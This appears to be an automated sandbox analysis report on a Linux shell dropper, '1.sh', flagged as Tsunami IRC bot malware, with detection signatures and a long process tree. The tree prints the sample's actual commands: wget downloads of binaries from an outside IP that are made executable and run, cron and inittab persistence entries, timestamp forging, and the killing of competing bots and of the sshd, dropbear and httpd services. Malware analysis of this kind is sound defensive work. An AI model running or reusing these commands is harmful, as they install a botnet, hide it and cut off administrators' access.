Analysis Report 1.sh

Overview

General Information

Sample Name: 1.sh
Analysis ID: 375765
MD5: 65fc26f78151a04e71dd86ca38cf4fd2
SHA1: 3adf311b9e97dac5ccd95cf9c992c17e5c3ffabd
SHA256: 864d438887ea34ffd06b03695267e93b48e73ec0f39d047968a1cce44448c581

Detection

Tsunami
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Tsunami
Executes the "crontab" command typically for achieving persistence
Explicitly modifies time stamps using the "touch" command
Machine Learning detection for dropped file
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using cron
Terminates several processes with shell command 'killall'
Uses IRC for communication with a C&C
Uses known network protocols on non-standard ports
Writes identical ELF files to multiple locations
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "grep" command used to find patterns in files or piped streams
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "touch" command used to create files or modify time stamps
Executes the "wget" command typically used for HTTP/S downloading
Sample contains strings that are potentially command strings
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Yara signature match

Startup

  • system is lnxubuntu1
  • sh (PID: 4579, Parent: 4518, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh /tmp/1.sh
    • sh New Fork (PID: 4581, Parent: 4579)
    • wget (PID: 4581, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty0 -O /var/run/tty0
    • sh New Fork (PID: 4605, Parent: 4579)
    • chmod (PID: 4605, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty0
    • sh New Fork (PID: 4606, Parent: 4579)
    • chmod (PID: 4606, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty0
    • sh New Fork (PID: 4607, Parent: 4579)
    • sh New Fork (PID: 4608, Parent: 4579)
    • wget (PID: 4608, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty1 -O /var/run/tty1
    • sh New Fork (PID: 4637, Parent: 4579)
    • chmod (PID: 4637, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty1
    • sh New Fork (PID: 4639, Parent: 4579)
    • chmod (PID: 4639, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty1
    • sh New Fork (PID: 4643, Parent: 4579)
    • sh New Fork (PID: 4644, Parent: 4579)
    • wget (PID: 4644, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty2 -O /var/run/tty2
    • sh New Fork (PID: 4669, Parent: 4579)
    • chmod (PID: 4669, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty2
    • sh New Fork (PID: 4670, Parent: 4579)
    • chmod (PID: 4670, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty2
    • sh New Fork (PID: 4671, Parent: 4579)
    • sh New Fork (PID: 4672, Parent: 4579)
    • wget (PID: 4672, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty3 -O /var/run/tty3
    • sh New Fork (PID: 4701, Parent: 4579)
    • chmod (PID: 4701, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty3
    • sh New Fork (PID: 4702, Parent: 4579)
    • chmod (PID: 4702, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty3
    • sh New Fork (PID: 4704, Parent: 4579)
    • sh New Fork (PID: 4705, Parent: 4579)
    • wget (PID: 4705, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty4 -O /var/run/tty4
    • sh New Fork (PID: 4733, Parent: 4579)
    • chmod (PID: 4733, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty4
    • sh New Fork (PID: 4734, Parent: 4579)
    • chmod (PID: 4734, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty4
    • sh New Fork (PID: 4735, Parent: 4579)
    • sh New Fork (PID: 4736, Parent: 4579)
    • wget (PID: 4736, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty5 -O /var/run/tty5
    • sh New Fork (PID: 4765, Parent: 4579)
    • chmod (PID: 4765, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty5
    • sh New Fork (PID: 4766, Parent: 4579)
    • chmod (PID: 4766, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty5
    • sh New Fork (PID: 4767, Parent: 4579)
    • sh New Fork (PID: 4768, Parent: 4579)
    • wget (PID: 4768, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty6 -O /var/run/tty6
    • sh New Fork (PID: 4797, Parent: 4579)
    • chmod (PID: 4797, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty6
    • sh New Fork (PID: 4798, Parent: 4579)
    • chmod (PID: 4798, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty6
    • sh New Fork (PID: 4799, Parent: 4579)
    • sh New Fork (PID: 4800, Parent: 4579)
    • wget (PID: 4800, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/pty -O pty
    • sh New Fork (PID: 4829, Parent: 4579)
    • chmod (PID: 4829, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x pty
    • sh New Fork (PID: 4830, Parent: 4579)
    • chmod (PID: 4830, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 pty
    • sh New Fork (PID: 4831, Parent: 4579)
    • pty (PID: 4831, Parent: 4579, MD5: unknown) Arguments: ./pty
      • pty New Fork (PID: 4846, Parent: 4831)
        • pty New Fork (PID: 4849, Parent: 4846)
        • sh (PID: 4849, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"
          • sh New Fork (PID: 4851, Parent: 4849)
          • rm (PID: 4851, Parent: 4849, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/wgsh
        • pty New Fork (PID: 4857, Parent: 4846)
        • sh (PID: 4857, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"
          • sh New Fork (PID: 4863, Parent: 4857)
          • rm (PID: 4863, Parent: 4857, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/bbsh
        • pty New Fork (PID: 4867, Parent: 4846)
        • sh (PID: 4867, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"
          • sh New Fork (PID: 4891, Parent: 4867)
          • rm (PID: 4891, Parent: 4867, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/pty
        • pty New Fork (PID: 4899, Parent: 4846)
        • sh (PID: 4899, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 arm > /dev/null 2>&1 &"
          • sh New Fork (PID: 4902, Parent: 4899)
          • killall (PID: 4902, Parent: 4899, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 arm
        • pty New Fork (PID: 4906, Parent: 4846)
        • sh (PID: 4906, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mips > /dev/null 2>&1 &"
          • sh New Fork (PID: 4917, Parent: 4906)
          • killall (PID: 4917, Parent: 4906, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mips
        • pty New Fork (PID: 4921, Parent: 4846)
        • sh (PID: 4921, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mipsel > /dev/null 2>&1 &"
          • sh New Fork (PID: 4931, Parent: 4921)
          • killall (PID: 4931, Parent: 4921, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mipsel
        • pty New Fork (PID: 4935, Parent: 4846)
        • sh (PID: 4935, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 powerpc > /dev/null 2>&1 &"
          • sh New Fork (PID: 4940, Parent: 4935)
          • killall (PID: 4940, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 powerpc
        • pty New Fork (PID: 4942, Parent: 4846)
        • sh (PID: 4942, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 ppc > /dev/null 2>&1 &"
          • sh New Fork (PID: 4947, Parent: 4942)
          • killall (PID: 4947, Parent: 4942, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 ppc
        • pty New Fork (PID: 4951, Parent: 4846)
        • sh (PID: 4951, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 4963, Parent: 4951)
          • killall (PID: 4963, Parent: 4951, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.armv4l.mod
        • pty New Fork (PID: 4966, Parent: 4846)
        • sh (PID: 4966, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 4987, Parent: 4966)
          • killall (PID: 4987, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.i686.mod
        • pty New Fork (PID: 4990, Parent: 4846)
        • sh (PID: 4990, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 4999, Parent: 4990)
          • killall (PID: 4999, Parent: 4990, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.mips.mod
        • pty New Fork (PID: 5012, Parent: 4846)
        • sh (PID: 5012, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 5027, Parent: 5012)
          • killall (PID: 5027, Parent: 5012, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.mipsel.mod
        • pty New Fork (PID: 5030, Parent: 4846)
        • sh (PID: 5030, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 5055, Parent: 5030)
            • sh New Fork (PID: 5063, Parent: 5055)
            • cat (PID: 5063, Parent: 5055, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /tmp/.xs/*.pid
        • pty New Fork (PID: 5057, Parent: 4846)
        • sh (PID: 5057, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"
          • sh New Fork (PID: 5070, Parent: 5057)
          • rm (PID: 5070, Parent: 3310, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /tmp/.xs/*
        • pty New Fork (PID: 5080, Parent: 4846)
        • sh (PID: 5080, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chmod 700 /tmp/pty > /dev/null 2>&1 &"
          • sh New Fork (PID: 5086, Parent: 5080)
          • chmod (PID: 5086, Parent: 5080, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /tmp/pty
        • pty New Fork (PID: 5090, Parent: 4846)
        • sh (PID: 5090, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /tmp/pty"
          • sh New Fork (PID: 5103, Parent: 5090)
          • touch (PID: 5103, Parent: 5090, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /tmp/pty
        • pty New Fork (PID: 5130, Parent: 4846)
        • sh (PID: 5130, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "(crontab -l | grep -v \"/tmp/pty\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
          • sh New Fork (PID: 5142, Parent: 5130)
            • sh New Fork (PID: 5154, Parent: 5142)
            • crontab (PID: 5154, Parent: 5142, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
            • sh New Fork (PID: 5155, Parent: 5142)
            • grep (PID: 5155, Parent: 5142, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/pty
            • sh New Fork (PID: 5156, Parent: 5142)
            • grep (PID: 5156, Parent: 5142, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v "no cron"
            • sh New Fork (PID: 5157, Parent: 5142)
            • grep (PID: 5157, Parent: 5142, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v lesshts/run.sh
        • pty New Fork (PID: 5201, Parent: 4846)
        • sh (PID: 5201, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"* * * * * /tmp/pty > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
        • pty New Fork (PID: 5202, Parent: 4846)
        • sh (PID: 5202, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "crontab /var/run/.x001804289383"
          • sh New Fork (PID: 5204, Parent: 5202)
          • crontab (PID: 5204, Parent: 5202, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab /var/run/.x001804289383
        • pty New Fork (PID: 5228, Parent: 4846)
        • sh (PID: 5228, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/.x001804289383"
          • sh New Fork (PID: 5230, Parent: 5228)
          • rm (PID: 5230, Parent: 5228, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/.x001804289383
        • pty New Fork (PID: 5239, Parent: 4846)
        • sh (PID: 5239, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5243, Parent: 5239)
          • uname (PID: 5243, Parent: 5239, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • pty New Fork (PID: 5264, Parent: 4846)
        • sh (PID: 5264, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5265, Parent: 5264)
          • uname (PID: 5265, Parent: 5264, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • pty New Fork (PID: 8337, Parent: 4846)
          • pty New Fork (PID: 8338, Parent: 8337)
          • sh (PID: 8338, Parent: 8337, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 & "
            • sh New Fork (PID: 8339, Parent: 8338)
              • sh New Fork (PID: 8340, Parent: 8339)
              • cat (PID: 8340, Parent: 8339, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/dropbear.pid
              • sh New Fork (PID: 8341, Parent: 8339)
              • cat (PID: 8341, Parent: 8339, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/sshd.pid
              • sh New Fork (PID: 8342, Parent: 8339)
              • killall (PID: 8342, Parent: 8339, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 sshd dropbear
              • sh New Fork (PID: 8375, Parent: 8339)
              • pidof (PID: 8375, Parent: 8339, MD5: 1927a3fb9f656f7b53b72c92cbbecfe9) Arguments: pidof sshd
              • sh New Fork (PID: 8384, Parent: 8339)
              • pidof (PID: 8384, Parent: 8339, MD5: 1927a3fb9f656f7b53b72c92cbbecfe9) Arguments: pidof dropbear
    • sh New Fork (PID: 4832, Parent: 4579)
    • wget (PID: 4832, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/irq0 -O irq0
    • sh New Fork (PID: 5282, Parent: 4579)
    • chmod (PID: 5282, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x irq0
    • sh New Fork (PID: 5283, Parent: 4579)
    • chmod (PID: 5283, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 irq0
    • sh New Fork (PID: 5285, Parent: 4579)
    • irq0 (PID: 5285, Parent: 4579, MD5: unknown) Arguments: /usr/bin/qemu-arm ./irq0
      • irq0 New Fork (PID: 5319, Parent: 5285)
      • sh (PID: 5319, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chmod 700 /tmp/irq0 > /dev/null 2>&1 &"
        • sh New Fork (PID: 5321, Parent: 5319)
        • chmod (PID: 5321, Parent: 5319, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /tmp/irq0
      • irq0 New Fork (PID: 5322, Parent: 5285)
      • sh (PID: 5322, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /tmp/irq0"
        • sh New Fork (PID: 5324, Parent: 5322)
        • touch (PID: 5324, Parent: 5322, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /tmp/irq0
      • irq0 New Fork (PID: 5325, Parent: 5285)
      • sh (PID: 5325, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "(crontab -l | grep -v \"/tmp/irq0\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
        • sh New Fork (PID: 5327, Parent: 5325)
          • sh New Fork (PID: 5328, Parent: 5327)
          • crontab (PID: 5328, Parent: 5327, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
          • sh New Fork (PID: 5329, Parent: 5327)
          • grep (PID: 5329, Parent: 5327, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq0
          • sh New Fork (PID: 5330, Parent: 5327)
          • grep (PID: 5330, Parent: 5327, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5331, Parent: 5327)
          • grep (PID: 5331, Parent: 5327, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v lesshts/run.sh
      • irq0 New Fork (PID: 5404, Parent: 5285)
      • sh (PID: 5404, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"* * * * * /tmp/irq0 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
      • irq0 New Fork (PID: 5406, Parent: 5285)
      • sh (PID: 5406, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "crontab /var/run/.x00740882966"
        • sh New Fork (PID: 5408, Parent: 5406)
        • crontab (PID: 5408, Parent: 5406, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab /var/run/.x00740882966
      • irq0 New Fork (PID: 5415, Parent: 5285)
      • sh (PID: 5415, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/.x00740882966"
        • sh New Fork (PID: 5441, Parent: 5415)
        • rm (PID: 5441, Parent: 5415, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/.x00740882966
      • irq0 New Fork (PID: 5444, Parent: 5285)
      • sh (PID: 5444, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/irq0\" > /etc/inittab2"
        • sh New Fork (PID: 5446, Parent: 5444)
        • cat (PID: 5446, Parent: 5444, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5447, Parent: 5444)
        • grep (PID: 5447, Parent: 5444, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq0
      • irq0 New Fork (PID: 5449, Parent: 5285)
      • sh (PID: 5449, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/irq0\" >> /etc/inittab2"
      • irq0 New Fork (PID: 5490, Parent: 5285)
      • sh (PID: 5490, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5492, Parent: 5490)
        • cat (PID: 5492, Parent: 5490, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab2
      • irq0 New Fork (PID: 5493, Parent: 5285)
      • sh (PID: 5493, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5520, Parent: 5493)
        • rm (PID: 5520, Parent: 5493, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /etc/inittab2
      • irq0 New Fork (PID: 5523, Parent: 5285)
      • sh (PID: 5523, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5525, Parent: 5523)
        • touch (PID: 5525, Parent: 5523, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /etc/inittab
      • irq0 New Fork (PID: 5526, Parent: 5285)
        • irq0 New Fork (PID: 5529, Parent: 5526)
        • sh (PID: 5529, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5562, Parent: 5529)
          • uname (PID: 5562, Parent: 5529, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq0 New Fork (PID: 5563, Parent: 5526)
        • sh (PID: 5563, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5565, Parent: 5563)
          • uname (PID: 5565, Parent: 5563, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq0 New Fork (PID: 5566, Parent: 5526)
        • sh (PID: 5566, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5568, Parent: 5566)
          • uname (PID: 5568, Parent: 5566, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq0 New Fork (PID: 5609, Parent: 5526)
        • sh (PID: 5609, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 5611, Parent: 5609)
            • sh New Fork (PID: 5612, Parent: 5611)
            • cat (PID: 5612, Parent: 5611, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/httpd.pid
        • irq0 New Fork (PID: 5613, Parent: 5526)
        • sh (PID: 5613, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service httpd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 5615, Parent: 5613)
          • service (PID: 5615, Parent: 3310, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service httpd stop
            • service New Fork (PID: 5621, Parent: 5615)
            • basename (PID: 5621, Parent: 5615, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5670, Parent: 5615)
            • basename (PID: 5670, Parent: 5615, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5695, Parent: 5615)
            • systemctl (PID: 5695, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 5745, Parent: 5615)
              • service New Fork (PID: 5746, Parent: 5745)
              • systemctl (PID: 5746, Parent: 5745, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 5747, Parent: 5745)
              • sed (PID: 5747, Parent: 5745, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 6015, Parent: 5615)
            • systemctl (PID: 6015, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 6062, Parent: 5615)
            • systemctl (PID: 6062, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 6323, Parent: 5615)
            • systemctl (PID: 6323, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 6387, Parent: 5615)
            • systemctl (PID: 6387, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 6443, Parent: 5615)
            • systemctl (PID: 6443, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 6520, Parent: 5615)
            • systemctl (PID: 6520, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 6558, Parent: 5615)
            • systemctl (PID: 6558, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 6612, Parent: 5615)
            • systemctl (PID: 6612, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 6648, Parent: 5615)
            • systemctl (PID: 6648, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 6675, Parent: 5615)
            • systemctl (PID: 6675, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 6710, Parent: 5615)
            • systemctl (PID: 6710, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 6733, Parent: 5615)
            • systemctl (PID: 6733, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 6762, Parent: 5615)
            • systemctl (PID: 6762, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 6783, Parent: 5615)
            • systemctl (PID: 6783, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 6818, Parent: 5615)
            • systemctl (PID: 6818, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 6845, Parent: 5615)
            • systemctl (PID: 6845, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 6872, Parent: 5615)
            • systemctl (PID: 6872, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 6899, Parent: 5615)
            • systemctl (PID: 6899, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 6926, Parent: 5615)
            • systemctl (PID: 6926, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 6953, Parent: 5615)
            • systemctl (PID: 6953, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 6965, Parent: 5615)
